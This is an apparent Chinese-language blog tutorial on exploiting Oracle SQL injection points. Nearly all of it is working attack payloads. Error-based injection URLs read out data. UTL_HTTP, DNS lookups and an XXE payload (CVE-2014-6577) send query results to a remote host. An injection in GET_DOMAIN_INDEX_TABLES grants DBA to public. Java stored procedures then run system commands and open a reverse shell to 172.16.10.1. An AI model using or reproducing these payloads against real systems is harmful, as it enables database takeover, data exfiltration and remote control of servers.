文章目录
  1. 1. 数据获取
    1. 1.1. 报错注入的几种方式
      1. 1.1.1. 0x1 utl_inaddr.get_host_name
      2. 1.1.2. 0x2 ctxsys.drithsx.sn
      3. 1.1.3. 0x3 XMLType
      4. 1.1.4. 0x4 dbms_xdb_version.checkin
      5. 1.1.5. 0x5 dbms_xdb_version.makeversioned
      6. 1.1.6. 0x6 dbms_xdb_version.uncheckout
      7. 1.1.7. 0x7 dbms_utility.sqlid_to_sqlhash
    2. 1.2. UTL_HTTP.request的使用
    3. 1.3. UTL_INADDR.GET_HOST_ADDRESS&SYS.DBMS_LDAP.INIT
    4. 1.4. Oracle XXE(CVE-2014-6577)
  2. 2. Oracle 提权漏洞
    1. 2.1. GET_DOMAIN_INDEX_TABLES函数注入漏洞
      1. 2.1.1. 权限提升
      2. 2.1.2. 命令执行
        1. 2.1.2.1. 创建JAVA代码
        2. 2.1.2.2. 赋予JAVA执行权限
        3. 2.1.2.3. 创建函数
        4. 2.1.2.4. 赋予函数执行权限
        5. 2.1.2.5. 执行命令
      3. 2.1.3. 反弹SHELL
        1. 2.1.3.1. 创建JAVA代码
        2. 2.1.3.2. 赋予JAVA执行权限
        3. 2.1.3.3. 创建函数
        4. 2.1.3.4. 赋予函数执行权限
        5. 2.1.3.5. 反弹SHELL

本文主要讨论在得到一枚oracle注入点时,如何通过Oracle自带函数或者缺陷获取数据,权限提升以及获得系统权限。

数据获取

报错注入的几种方式

0x1 utl_inaddr.get_host_name

这种方法在Oracle 8g,9g,10g中不需要任何权限,但是在Oracle 11g以及以后的版本中,官方加强了访问控制权限,所以在11g以后要使用此方法进行报错注入,当前数据库用户必须有网络访问权限。

1
http://www.iswin.org/oracle.jsp?name=' and 1=utl_inaddr.get_host_name((select user from dual))--

0x2 ctxsys.drithsx.sn

1
http://www.iswin.org/oracle.jsp?name=' and 1=ctxsys.drithsx.sn(1,(select user from dual))--

0x3 XMLType

在使用这个XMLType进行报错时,很多人不知道为什么要用chr(60),通过ascii查询可以看到,60:<,58:’:’,62:’>’,查了下相关的api,发现xmltype在进行解析的时候必须以<开头>结尾,这里:冒号在这是必不可少的,至于为什么是冒号这个我也没查到,另外需要注意的是如果返回的数据种有空格的话,它会自动截断,导致数据不完整,有replace函数替换成其他非空字符就可以。

1
http://www.iswin.org/oracle.jsp?name=' and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null--

0x4 dbms_xdb_version.checkin

1
http://www.iswin.org/oracle.jsp?name=' and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null--

0x5 dbms_xdb_version.makeversioned

1
http://www.iswin.org/oracle.jsp?name=' and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null--

0x6 dbms_xdb_version.uncheckout

1
http://www.iswin.org/oracle.jsp?name=' and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null--

0x7 dbms_utility.sqlid_to_sqlhash

1
http://www.iswin.org/oracle.jsp?name=' and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null--

UTL_HTTP.request的使用

通过utl_http.request我们可以将查询的结果发送到远程服务器上,在遇到盲注时非常有用,要使用该方法用户需要有utl_http访问网络的权限。

1
http://www.iswin.org/oracle.jsp?name=' and (UTL_HTTP.request('http://www.iswin.org:80/'||(select banner from sys.v_$version where rownum=1))=1

UTL_INADDR.GET_HOST_ADDRESS&SYS.DBMS_LDAP.INIT

很多时候数据服务器都是站库分离的,而且不一定能出网,有时候可能会允许DNS请求,所以该方法能在一定情况下奏效。

1
http://www.iswin.org/oracle.jsp?name=' and (select utl_inaddr.get_host_address((select user from dual)||'.iswin.org') from dual)is not null--

1
http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_LDAP.INIT((select user from dual)||'.iswin.org') from dual)is not null--

Oracle XXE(CVE-2014-6577)

受影响版本:11.2.0.3, 11.2.0.4, 12.1.0.1 和12.1.0.2

这里Oracle的XXE的利用效果和UTL_http的效果差不多,都是将数据传输到远端服务器上,但是,由于extractvalue()函数对所有数据库用户都可以使用,不存在权限的问题,所以当在低权限没有UTL_http访问权限时,这个不失为一个好方法。

1
http://www.iswin.org/oracle.jsp?name=' and (select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://172.16.10.1:8080/'||(SELECT user from dual)||'"> %remote;]>'),'/l') from dual) is not null

Oracle 提权漏洞

GET_DOMAIN_INDEX_TABLES函数注入漏洞

影响版本:Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1-10.2.0.2

漏洞的成因是该函数的参数存在注入,而该函数的所有者是sys,所以通过注入就可以执行任意sql,该函数的执行权限为public,所以只要遇到一个oracle的注入点并且存在这个漏洞的,基本上都可以提升到最高权限。

权限提升

1
http://www.iswin.org/oracle.jsp?name=' and (SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS _OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant dba to public'''';END;'';END;--','SYS',0,'1',0)) is not null--

权限提升之后就可以做很多事了,因为Oracle可以执行JAVA代码,所以在提升权限后具体怎么操作,就看各自的JAVA水平了。
这里给出几种常见的利用方式。

命令执行

创建JAVA代码

1
http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "Command" as import java.io.*;public class Command{public static String exec(String cmd) throws Exception{String sb="";BufferedInputStream in = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream());BufferedReader inBr = new BufferedReader(new InputStreamReader(in));String lineStr;while ((lineStr = inBr.readLine()) != null)sb+=lineStr+"\n";inBr.close();in.close();return sb;}}'''';END;'';END;--','SYS',0,'1',0) from dual) is not null

赋予JAVA执行权限

1
http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

创建函数

1
http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function cmd(p_cmd in varchar2) return varchar2 as language java name ''''''''Command.exec(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

赋予函数执行权限

1
http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on cmd to public'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

执行命令

1
http://www.iswin.org/oracle.jsp?name=' and (select sys.cmd('cmd.exe /c whoami') from dual) is not null--

反弹SHELL

创建JAVA代码

当执行命令没有什么太大的帮助时,我们可以反弹一个交互式的shell,这样会方便很多。

1
http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "shell" as import java.io.*;import java.net.*;public class shell{public static void run() throws Exception {Socket s = new Socket("172.16.10.1", 80);Process p = Runtime.getRuntime().exec("cmd.exe");new T(p.getInputStream(), s.getOutputStream()).start();new T(p.getErrorStream(), s.getOutputStream()).start();new T(s.getInputStream(), p.getOutputStream()).start();}static class T extends Thread {private InputStream i;private OutputStream u;public T(InputStream in, OutputStream out) {this.u = out;this.i = in;}public void run() {BufferedReader n = new BufferedReader(new InputStreamReader(i));BufferedWriter w = new BufferedWriter(new OutputStreamWriter(u));char f[] = new char[8192];int l;try {while ((l = n.read(f, 0, f.length)) > 0) {w.write(f, 0, l);w.flush();}} catch (IOException e) {}try {if (n != null)n.close();if (w != null)w.close();} catch (Exception e) {}}}}'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

赋予JAVA执行权限

1
http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.net.SocketPermission'''''''', ''''''''<>'''''''', ''''''''*'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

创建函数

1
http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function reversetcp RETURN VARCHAR2 as language java name ''''''''shell.run() return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

赋予函数执行权限

1
http://www.iswin.org/oracle.jsp?name=' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on reversetcp to public'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

反弹SHELL

1
http://www.iswin.org/oracle.jsp?name=' and (select sys.reversetcp from dual) is not null--
文章目录
  1. 1. 数据获取
    1. 1.1. 报错注入的几种方式
      1. 1.1.1. 0x1 utl_inaddr.get_host_name
      2. 1.1.2. 0x2 ctxsys.drithsx.sn
      3. 1.1.3. 0x3 XMLType
      4. 1.1.4. 0x4 dbms_xdb_version.checkin
      5. 1.1.5. 0x5 dbms_xdb_version.makeversioned
      6. 1.1.6. 0x6 dbms_xdb_version.uncheckout
      7. 1.1.7. 0x7 dbms_utility.sqlid_to_sqlhash
    2. 1.2. UTL_HTTP.request的使用
    3. 1.3. UTL_INADDR.GET_HOST_ADDRESS&SYS.DBMS_LDAP.INIT
    4. 1.4. Oracle XXE(CVE-2014-6577)
  2. 2. Oracle 提权漏洞
    1. 2.1. GET_DOMAIN_INDEX_TABLES函数注入漏洞
      1. 2.1.1. 权限提升
      2. 2.1.2. 命令执行
        1. 2.1.2.1. 创建JAVA代码
        2. 2.1.2.2. 赋予JAVA执行权限
        3. 2.1.2.3. 创建函数
        4. 2.1.2.4. 赋予函数执行权限
        5. 2.1.2.5. 执行命令
      3. 2.1.3. 反弹SHELL
        1. 2.1.3.1. 创建JAVA代码
        2. 2.1.3.2. 赋予JAVA执行权限
        3. 2.1.3.3. 创建函数
        4. 2.1.3.4. 赋予函数执行权限
        5. 2.1.3.5. 反弹SHELL